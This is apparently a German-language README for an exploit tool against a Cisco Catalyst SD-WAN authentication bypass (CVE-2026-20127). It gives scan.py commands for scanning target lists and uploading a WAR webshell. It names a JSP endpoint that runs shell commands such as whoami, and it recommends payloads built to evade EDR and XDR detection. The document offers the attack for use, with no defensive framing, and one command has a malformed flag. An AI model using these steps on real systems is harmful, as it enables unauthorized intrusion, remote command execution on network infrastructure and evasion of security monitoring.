
Cisco Catalyst SD-WAN Authentifizierungs-Bypass-Schwachstelle (CVE-2026-20127) Exploit-EXP
Exploit-EXP für die Cisco Catalyst SD-WAN Authentifizierungsumgehungs-Schwachstelle (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
Nach erfolgreicher Reproduktion der Schwachstelle zeigt der Zugriff auf /cmd.gz/cmd.jsp?cmd=whoami das Ergebnis auf der Seite an
Wenn Sie eine Webshell verwenden möchten, erstellen Sie bitte selbst ein WAR-Paket (es wird empfohlen, eine schadsoftware-umgehende Payload zu verwenden; Tests haben gezeigt, dass Windows-Systeme über EDR oder XDR verfügen können)